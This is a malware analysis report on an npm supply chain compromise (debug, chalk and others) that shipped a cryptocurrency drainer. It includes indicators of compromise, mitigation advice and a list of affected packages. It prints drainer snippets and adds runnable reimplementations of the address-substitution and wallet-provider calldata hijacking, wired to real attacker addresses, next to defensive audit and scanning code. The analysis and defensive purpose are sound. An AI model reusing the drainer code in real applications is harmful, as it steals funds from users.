NPM Supply Chain Attack

The NPM ecosystem recently experienced yet another large-scale supply chain incident, in which 27 widely used packages, including popular libraries such as debug and chalk, were compromised with malware that operates as a cryptocurrency drainer. The affected packages have a combined download count of more than 2 billion per week, and the breach shows how criminals exploit trusted software distribution channels to deliver Web3 wallet-hijacking code.

This report provides an in-depth examination of how the malicious payload functions, its method of spreading through npm packages, and the indicators of compromise (IOCs) tied to this attack.

NPM supply chain compromise

The intrusion originated with a carefully orchestrated phishing campaign aimed at package maintainers. Adversaries sent fraudulent emails from “support@npmjs.help”, a domain registered only three days before the operation, which enabled them to obtain maintainer credentials. With those credentials, they injected malicious code into 27 popular npm packages, among them:

  • debug—a well-known debugging utility
  • chalk—a library for styling terminal strings
  • Several other packages downloaded millions of times each week

The altered packages contained a payload crafted to specifically target Web3 applications and cryptocurrency-related operations. This case demonstrates how even trusted development dependencies can be turned into vectors for financial malware propagation.

Web3 wallet attack surface

Browser-based cryptocurrency wallets such as MetaMask, Trust Wallet, and similar tools have become essential for interacting with decentralized applications (DApps). These wallet extensions expose a provider object (window.ethereum) to every page that loads, so when a web application ships a compromised npm package, the malicious code runs in the same page context into which the wallet's provider is injected, and it can observe and rewrite every request the application sends to the wallet. That shared browser context is what turns a dependency compromise into a practical route to transaction manipulation.

Malware analysis

The cryptocurrency-draining malware examined shows a solid understanding of blockchain protocols and wallet interactions. Engineered to run covertly, it sits between the application and the wallet, intercepting the requests the application sends to the wallet provider and rewriting transactions so that funds go to attacker-controlled addresses across several blockchain ecosystems.

Initial obfuscation techniques

The original malicious code makes extensive use of obfuscation to avoid detection. Identifiers for variables have been replaced with hexadecimal-style names such as _0x124ed3 and _0xba16ef, and function identifiers are similarly concealed. The payload also employs a complex object layout to hold hundreds of cryptocurrency addresses, which substantially complicates static code analysis.

var _0xba16ef = {
  'zprkq': function (_0x23e86b, _0x5b593c) {
    return _0x23e86b + _0x5b593c;
  },
  'OiGzk': "1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx",
  'FlhWy': "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976"
  // ... hundreds more obfuscated properties
};

Figure 1. Obfuscated variable structure that stores attacker-controlled addresses

Multi-stage attack chain

After a compromised npm package is installed and executed—whether in a development workstation or a production environment—the malware proceeds through a series of coordinated stages designed to persist and maximize opportunities to steal cryptocurrency.

Stage 1: NPM package execution and environment detection

The malicious code runs as part of the legitimate package’s installation or runtime. It then probes the environment to detect the presence of Web3 wallets and begins initializing its payload.

Stage 2: Web3 wallet detection and initialization

The malware attempts to identify Web3 wallet instances in the browser context. It specifically checks for window.ethereum objects, which indicate MetaMask or other Ethereum-compatible wallet providers, and proceeds with initialization if such interfaces are present.

// Probe for an injected Ethereum provider; if the user has already connected
// an account to the page, start the hijacking routine
async function checkethereumw() {
  try {
    const accounts = await window.ethereum.request({
      'method': "eth_accounts"
    });
    if (accounts.length > 0) {
      runmask(); // Initialize wallet hijacking
    }
  } catch (error) {
    // Fallback initialization (no provider present, or the request was rejected)
  }
}

Figure 2. Mechanism for detecting Web3 wallets in the browser environment

Stage 3: Network traffic interception

Once active, the malware hooks into both the fetch API and XMLHttpRequest to intercept outgoing and incoming network traffic. This interception enables modification of API responses that include cryptocurrency addresses before those responses are handled by the victim application.

// Hook fetch API: keep a reference to the original so the hook can call
// through, then rewrite any addresses in the response body before the
// application sees it
const originalFetch = window.fetch;
window.fetch = async function (...args) {
  const response = await originalFetch.apply(this, args);
  const data = await response.text();
  const modifiedData = replaceAddressesInContent(data);
  return new Response(modifiedData, {
    'status': response.status,
    'headers': response.headers
  });
};

Figure 3. Network interception workflow (hooks into fetch and XMLHttpRequest)

Stage 4: Advanced address replacement using fuzzy matching

A particularly sophisticated component of the payload is its use of the Levenshtein distance algorithm for fuzzy string matching. Rather than performing blunt string replacements, the malware searches for the attacker address that is the “closest” match to any legitimate address it encounters, making substituted values less conspicuous to users.

function calculateEditDistance(str1, str2) {
  // Levenshtein distance implementation
  const matrix = Array.from({
    'length': str1.length + 1
  }, () => Array(str2.length + 1).fill(0));
  // ... distance calculation logic
}

Figure 4. Fuzzy-matching (Levenshtein) algorithm used to select attacker addresses for replacement
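
As an added example that is not part of the original analysis or the drainer's own code, the following JavaScript implements the Stage 4 pipeline end to end: a Levenshtein edit distance, per-chain address classification using the public Ethereum, Bitcoin legacy, Bitcoin bech32 and Solana formats, selection of the closest attacker address, and replacement inside a response body, which is the job replaceAddressesInContent() does in the fetch hook of Figure 3. The attacker set is built from the IOCs listed later on this page; the victim addresses and the API response are constructed test data.

```javascript
// Added example (not the drainer's own code): the Stage 4 substitution
// pipeline. editDistance() is standard Levenshtein; the address patterns are
// the public formats for each chain; the attacker set uses the IOCs listed
// on this page; VICTIM_* and SAMPLE_RESPONSE are constructed test data.

function editDistance(a, b) {
  // Two-row Levenshtein: prev[j] is the distance between a[0..i-1] and b[0..j-1]
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Classify a token by chain. Order matters: a 34-char legacy Bitcoin address
// is also valid base58 of Solana length, so Bitcoin is tested first.
function classifyAddress(token) {
  if (/^0x[0-9a-fA-F]{40}$/.test(token)) return 'ethereum';
  if (/^bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{25,62}$/.test(token)) return 'bitcoinSegwit';
  if (/^[13][1-9A-HJ-NP-Za-km-z]{25,34}$/.test(token)) return 'bitcoinLegacy';
  if (/^[1-9A-HJ-NP-Za-km-z]{32,44}$/.test(token)) return 'solana';
  return null;
}

// Pick the attacker address with the smallest edit distance to the original.
// Comparison is case-insensitive because Ethereum checksum casing varies.
function closestAttackerAddress(original, candidates) {
  let best = null;
  let bestDistance = Infinity;
  for (const candidate of candidates) {
    const d = editDistance(original.toLowerCase(), candidate.toLowerCase());
    if (d < bestDistance) { best = candidate; bestDistance = d; }
  }
  return best;
}

// Any word-like run long enough to be an address; classifyAddress() filters the rest.
const ADDRESS_TOKEN = /\b(?:0x)?[0-9A-Za-z]{25,64}\b/g;

function replaceAddressesInContent(content, attackerAddresses) {
  return content.replace(ADDRESS_TOKEN, (token) => {
    const chain = classifyAddress(token);
    const candidates = chain && attackerAddresses[chain];
    if (!candidates || candidates.includes(token)) return token; // unknown chain, or already ours
    return closestAttackerAddress(token, candidates);
  });
}

// Attacker set built from the IOCs reported on this page.
const ATTACKER_ADDRESSES = {
  ethereum: [
    '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976',
    '0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024',
    '0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B',
  ],
  bitcoinLegacy: ['1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx', '1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd'],
  bitcoinSegwit: ['bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm', 'bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9'],
  solana: ['5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6', '98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ'],
};

// Constructed API response: each victim address is a one- or two-character
// edit of one attacker address, so that address is the one substituted.
const VICTIM_ETH = '0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c0ff';
const VICTIM_BTC = '1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHz';
const SAMPLE_RESPONSE = JSON.stringify({
  deposit: { eth: VICTIM_ETH, btc: VICTIM_BTC },
  txid: 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', // not an address, left alone
});

console.log(replaceAddressesInContent(SAMPLE_RESPONSE, ATTACKER_ADDRESSES));
```

The token regex is deliberately broad and the classifier narrow: the scan must find addresses wherever they sit in a JSON or HTML body, while only strings that match a known chain format are ever rewritten, which keeps transaction hashes and other long hex values untouched and the response parseable.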

Stage 5: Transaction hijacking and manipulation

The final—and most critical—phase involves intercepting wallet transaction routines and altering them to favor the attacker. The malware targets several core Ethereum functions:

ERC-20 Token Approval Manipulation:

  • Intercepts approve() calls (selector 0x095ea7b3).
  • Replaces the intended spender with the attacker's address.
  • Sets the allowance to the maximum uint256 value (64 f characters in hexadecimal), an unlimited approval that the attacker can later spend with transferFrom().

Transaction Redirection:

  • Intercepts transfer() calls (0xa9059cbb) and replaces the recipient to redirect funds.
  • Modifies transferFrom() calls (0x23b872dd) to exfiltrate tokens.
  • Manipulates permit() calls (0xd505accf, the EIP-2612 signature-based approval) to obtain gasless approvals.

// Rewrite an ERC-20 approve(spender, amount) call, selector 0x095ea7b3
if (data.startsWith("0x095ea7b3")) {
  const functionSig = data.substring(0, 10);
  // ABI encoding: the address is left-padded with zeros to a 32-byte word (64 hex chars)
  const attackerAddress = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
  // uint256 max: 32 bytes of 0xff, i.e. an unlimited allowance
  const unlimitedAmount = 'f'.repeat(64);
  modified.data = functionSig + attackerAddress + unlimitedAmount;
}

Figure 5. ERC-20 approval manipulation logic
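
To make the Stage 5 logic concrete, the following added example (written for this page, not extracted from the drainer) shows a minimal ABI encoder/decoder for the three ERC-20 functions named above, the rewriting a hooked eth_sendTransaction request undergoes, and a defender-side auditCalldata() check that decodes calldata before it is signed and flags a known attacker address or an unlimited allowance. The selectors are the standard ERC-20 ones; ATTACKER is the page's primary Ethereum IOC; the wallet provider is a mock object that records what it would have asked the user to sign. The exact rewrite rule for transferFrom() (recipient swapped for the attacker) is an assumption consistent with the bullet list, not a detail the page states.

```javascript
// Added example for this page (not code from the drainer): ERC-20 calldata
// rewriting as done by a hooked provider, and a pre-signing audit of calldata.
// Selectors are the standard ERC-20 ones named in the text; ATTACKER is the
// page's primary Ethereum IOC; the wallet provider below is a mock.

const SELECTORS = {
  '0x095ea7b3': { name: 'approve',      args: ['address', 'uint256'] },
  '0xa9059cbb': { name: 'transfer',     args: ['address', 'uint256'] },
  '0x23b872dd': { name: 'transferFrom', args: ['address', 'address', 'uint256'] },
};
const MAX_UINT256 = (1n << 256n) - 1n;
const ATTACKER = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976';

// ABI encoding: every static argument is one 32-byte word (64 hex chars);
// addresses are left-padded with zeros, integers are big-endian.
const encAddress = (a) => a.slice(2).toLowerCase().padStart(64, '0');
const encUint = (n) => n.toString(16).padStart(64, '0');
const decWord = (word, type) => (type === 'address' ? '0x' + word.slice(24) : BigInt('0x' + word));

function encodeCall(selector, args) {
  const spec = SELECTORS[selector];
  return selector + spec.args.map((t, i) => (t === 'address' ? encAddress(args[i]) : encUint(args[i]))).join('');
}

function decodeCall(data) {
  const selector = data.slice(0, 10).toLowerCase();
  const spec = SELECTORS[selector];
  const body = data.slice(10);
  if (!spec || body.length !== spec.args.length * 64) return null; // unknown selector or malformed calldata
  const words = body.match(/.{64}/g);
  return { name: spec.name, args: spec.args.map((t, i) => decWord(words[i], t)) };
}

// Attacker side: what the drainer does to each recognised call.
function hijackCalldata(data) {
  const call = decodeCall(data);
  if (!call) return data;
  const selector = data.slice(0, 10).toLowerCase();
  switch (call.name) {
    case 'approve':      return encodeCall(selector, [ATTACKER, MAX_UINT256]);                // approve(attacker, unlimited)
    case 'transfer':     return encodeCall(selector, [ATTACKER, call.args[1]]);               // transfer(attacker, amount)
    case 'transferFrom': return encodeCall(selector, [call.args[0], ATTACKER, call.args[2]]); // transferFrom(from, attacker, amount), assumed rule
    default:             return data;
  }
}

// Wrap provider.request the way the payload hooks window.ethereum, keeping the
// original reference so every other method passes through untouched.
function hookWalletProvider(provider) {
  const original = provider.request.bind(provider);
  provider.request = (req) => {
    const tx = req.method === 'eth_sendTransaction' && req.params && req.params[0];
    if (tx && tx.data) return original({ ...req, params: [{ ...tx, data: hijackCalldata(tx.data) }] });
    return original(req);
  };
  return provider;
}

// Defender side: decode what is about to be signed and refuse known-bad shapes.
function auditCalldata(data, attackerAddresses) {
  const call = decodeCall(data);
  if (!call) return { ok: true, reasons: [] }; // not an ERC-20 call this checker understands
  const bad = new Set(attackerAddresses.map((a) => a.toLowerCase()));
  const reasons = [];
  call.args.forEach((arg, i) => {
    if (typeof arg === 'string' && bad.has(arg)) reasons.push(`${call.name} arg ${i}: known attacker address ${arg}`);
    if (typeof arg === 'bigint' && arg === MAX_UINT256) reasons.push(`${call.name} arg ${i}: unlimited allowance`);
  });
  return { ok: reasons.length === 0, reasons };
}

// Constructed mock provider: records each request it would have shown the user.
const mockProvider = {
  sent: [],
  async request(req) { this.sent.push(req); return '0x' + '0'.repeat(64); },
};
const USER_SPENDER = '0x1111111111111111111111111111111111111111'; // constructed legitimate spender
const legitApprove = encodeCall('0x095ea7b3', [USER_SPENDER, 1000n]);

hookWalletProvider(mockProvider).request({ method: 'eth_sendTransaction', params: [{ to: USER_SPENDER, data: legitApprove }] });
console.log(decodeCall(mockProvider.sent[0].params[0].data));
console.log(auditCalldata(mockProvider.sent[0].params[0].data, [ATTACKER]));
```

The audit runs on the calldata the wallet is about to sign, not on what the application thinks it sent, which is the only vantage point that still sees the truth once the page's own fetch and provider objects have been hooked; a wallet or a browser extension that decodes calldata this way can refuse the transaction before the user confirms it.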

Cross-chain support

The malware reflects broad technical capability by supporting multiple blockchain networks:

  • Ethereum: ERC-20 tokens and ETH transfers
  • Bitcoin: Legacy and SegWit address formats
  • Solana: SPL token transactions
  • TRON: TRX and TRC-20 tokens
  • Litecoin: multiple address formats
  • Bitcoin Cash: CashAddr format

Each blockchain uses distinct address patterns and transaction schemas, so the payload implements specialized handling logic for every supported network.

Stealth and persistence mechanisms

To remain undetected, the malware employs several tactics:

  • Method Hooking: preserves original references to functions and can restore them when necessary.
  • Gradual Deployment: uses retry logic with delays to reduce the chance of detection.
  • Error Handling: includes graceful fallbacks so the host application does not crash.
  • Debug Interface: contains a hidden control interface to monitor interception success.

// Hidden global exposed by the payload: lets the operator check whether the
// hooks are installed, count interceptions, and re-hook the wallet provider
window.stealthProxyControl = {
  'isActive': () => isActive,
  'getInterceptCount': () => interceptionCount,
  'forceShield': () => hookWalletProvider(window.ethereum)
};

Figure 6. Hidden debug/control interface for monitoring and managing interception

Key indicators of compromise (IOCs)

Primary attacker addresses:

Ethereum:

  • 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976 (Primary)
  • 0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024
  • 0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B

Bitcoin Legacy:

  • 1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx
  • 1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd

Bitcoin SegWit:

  • bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm
  • bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9

Solana:

  • 5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6
  • 98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ

Impact and real-world implications

This npm supply chain compromise introduces severe risks to the cryptocurrency ecosystem:

  1. Massive Scale: with over 2 billion weekly downloads, the pool of potential victims is enormous.
  2. Supply Chain Trust: the compromise of trusted development dependencies undermines basic security assumptions.
  3. Financial Losses: direct theft of cryptocurrencies and tokens across multiple blockchain networks.
  4. Compromised DeFi Interactions: unlimited token approvals can lead to subsequent drainage of funds.
  5. Cross-Chain Impact: simultaneous attacks spanning multiple blockchains.
  6. Developer Targeting: the phishing targeted package maintainers, and the compromised packages reach developers who install them as dependencies as well as the users of the applications they build.
  7. Stealth Operations: the difficulty of detection allows prolonged compromise in both development and production environments.

The combination of distribution via the software supply chain and fuzzy address matching renders this attack particularly hazardous, because both the delivery mechanism and the payload appear legitimate, greatly lowering the chance of discovery.

Conclusion

The cryptocurrency drainer analyzed here illustrates the shifting threat landscape faced by Web3 users. By combining heavy obfuscation, cross-chain coverage, and edit-distance address substitution, the malware represents a notable escalation in cryptocurrency theft capability.

This incident emphasizes the vital importance of Web3 security awareness and the implementation of robust protective measures when interacting with cryptocurrency applications. As decentralized finance expands, more complex attacks aimed at wallet infrastructure and user interactions should be expected.

Mitigation recommendations

To guard against comparable supply chain incidents and cryptocurrency theft, developers and organizations should implement the following:

Supply Chain Security:

  • Dependency Auditing: perform regular audits of npm dependencies.
  • Package Lock Files: commit package-lock.json and install with npm ci so that only the locked versions are installed.
  • Trusted Sources: verify package publishers and avoid packages with suspicious changes in ownership.
  • Dependency Monitoring: deploy monitoring for unexpected package updates or alterations.
  • Private Registries: consider private npm registries for mission-critical applications.

Detection and Response:

  • Network Monitoring: monitor for anomalous network activity and API modifications.
  • Behavioral Analysis: implement detection for unusual wallet interaction patterns.
  • Security Scanning: use scanners such as Mend.io to identify malicious package installations.
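
As an added example for the Dependency Auditing and Security Scanning items above (it is not Mend.io's tooling or the page's own code), the following Node.js snippet checks a package-lock.json against the affected-versions table at the end of this page and scans a built bundle for the IOC strings reported here. The lockfile objects and the bundle text are constructed; package names in the AFFECTED table are lowercased, as npm publishes them.

```javascript
// Added example for this page (not Mend.io's scanner): check a lockfile
// against the affected-version table and scan text for the reported IOCs.
// AFFECTED mirrors the table at the end of the page, names lowercased as
// npm publishes them; the sample lockfiles and bundle are constructed.

const AFFECTED = {
  'backslash': ['0.2.1'], 'chalk-template': ['1.1.1'], 'supports-hyperlinks': ['4.1.1'],
  'has-ansi': ['6.0.1'], 'simple-swizzle': ['0.2.3'], 'color-string': ['2.1.1'],
  'error-ex': ['1.3.3'], 'color-name': ['2.0.1'], 'is-arrayish': ['0.3.3'],
  'slice-ansi': ['7.1.1'], 'color-convert': ['3.1.1'], 'wrap-ansi': ['9.0.1'],
  'ansi-regex': ['6.2.1'], 'supports-color': ['10.2.1'], 'strip-ansi': ['7.1.1'],
  'chalk': ['5.6.1'], 'debug': ['4.4.2'], 'ansi-styles': ['6.2.2'],
  'proto-tinker-wc': ['0.1.87'], 'prebid-universal-creative': ['1.17.3'],
  'duckdb': ['1.3.3'], '@duckdb/node-api': ['1.3.3'], '@duckdb/node-bindings': ['1.3.3'],
  '@duckdb/duckdb-wasm': ['1.29.2'], 'prebid.js': ['10.9.2'], 'prebid': ['10.9.1', '10.9.2'],
  '@coveops/abi': ['2.0.1'],
};

const isAffected = (name, version) => (AFFECTED[name] || []).includes(version);

// lockfileVersion 2/3: "packages" keys look like "node_modules/a/node_modules/@scope/b";
// the package name is everything after the last "node_modules/".
function packageNameFromLockKey(key) {
  const marker = 'node_modules/';
  const i = key.lastIndexOf(marker);
  return i === -1 ? null : key.slice(i + marker.length);
}

// lockfileVersion 1 nests a "dependencies" tree instead.
function walkV1(deps, prefix, hits) {
  for (const [name, entry] of Object.entries(deps || {})) {
    if (isAffected(name, entry.version)) hits.push({ path: prefix + name, name, version: entry.version });
    walkV1(entry.dependencies, `${prefix}${name}/node_modules/`, hits);
  }
}

// Returns every installed copy (including nested duplicates) at a compromised version.
function findCompromisedPackages(lockfile) {
  const hits = [];
  if (lockfile.packages) {
    for (const [key, entry] of Object.entries(lockfile.packages)) {
      const name = packageNameFromLockKey(key);
      if (name && isAffected(name, entry.version)) hits.push({ path: key, name, version: entry.version });
    }
  } else {
    walkV1(lockfile.dependencies, 'node_modules/', hits);
  }
  return hits;
}

// IOCs from this page: attacker addresses plus identifiers the payload leaves behind.
const IOC_STRINGS = [
  '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976', '0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024',
  '0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B', '1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx',
  '1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd', 'bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm',
  'bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9', '5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6',
  '98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ', 'stealthProxyControl', 'checkethereumw', 'runmask',
];

// Case-insensitive substring scan. Ethereum addresses are matched on their 40 hex
// digits without the 0x prefix, because in calldata the payload embeds them bare.
function scanForIocs(text) {
  const haystack = text.toLowerCase();
  return IOC_STRINGS.filter((ioc) => {
    const needle = ioc.startsWith('0x') ? ioc.slice(2) : ioc;
    return haystack.includes(needle.toLowerCase());
  });
}

// Constructed inputs.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/chalk': { version: '5.6.1' },
    'node_modules/debug': { version: '4.4.1' },
    'node_modules/foo/node_modules/debug': { version: '4.4.2' },
    'node_modules/@duckdb/node-api': { version: '1.3.3' },
  },
};
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: { chalk: { version: '5.6.1', dependencies: { 'ansi-styles': { version: '6.2.2' } } } },
};
const SAMPLE_BUNDLE = 'window.stealthProxyControl={};' +
  'modified.data=sig+"Fc4a4858bafef54D1b1d7697bfb5c52F4c166976"+"f".repeat(64);';

console.log(findCompromisedPackages(SAMPLE_LOCK));
console.log(scanForIocs(SAMPLE_BUNDLE));
```

For a real project, feed findCompromisedPackages() the result of JSON.parse(fs.readFileSync('package-lock.json', 'utf8')) and scanForIocs() the contents of each file under the build output directory; nested copies matter because a transitive dependency can pin its own compromised version of debug or chalk even when the top-level copy is clean.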

As supply chain attacks grow more sophisticated and cryptocurrency adoption continues to rise, proactive security controls are essential. Given the sheer scale of the npm ecosystem and the financial incentives in Web3, this attack vector will remain attractive to cybercriminals, demanding heightened vigilance from the developer community.

Affected packages

Package                     Version          MSC
backslash                   0.2.1            MSC-2025-7955
chalk-template              1.1.1            MSC-2025-7876
supports-hyperlinks         4.1.1            MSC-2025-7872
has-ansi                    6.0.1            MSC-2025-7873
simple-swizzle              0.2.3            MSC-2025-7886
color-string                2.1.1            MSC-2025-7875
error-ex                    1.3.3            MSC-2025-7881
color-name                  2.0.1            MSC-2025-7882
is-arrayish                 0.3.3            MSC-2025-7953
slice-ansi                  7.1.1            MSC-2025-7874
color-convert               3.1.1            MSC-2025-7954
wrap-ansi                   9.0.1            MSC-2025-7877
ansi-regex                  6.2.1            MSC-2025-7880
supports-color              10.2.1           MSC-2025-7879
strip-ansi                  7.1.1            MSC-2025-7878
chalk                       5.6.1            MSC-2025-7884
debug                       4.4.2            MSC-2025-7887
ansi-styles                 6.2.2            MSC-2025-7871
proto-tinker-wc             0.1.87           MSC-2025-7883
Prebid-universal-creative   1.17.3           MSC-2025-7890
duckdb                      1.3.3            MSC-2025-7949
@duckdb/node-api            1.3.3            MSC-2025-7888
@duckdb/node-bindings       1.3.3            MSC-2025-7889
@duckdb/duckdb-wasm         1.29.2           MSC-2025-7930
prebid.js                   10.9.2           MSC-2025-7950
Prebid                      10.9.1, 10.9.2   MSC-2025-7951, MSC-2025-7952
@coveops/abi                2.0.1            MSC-2025-7948
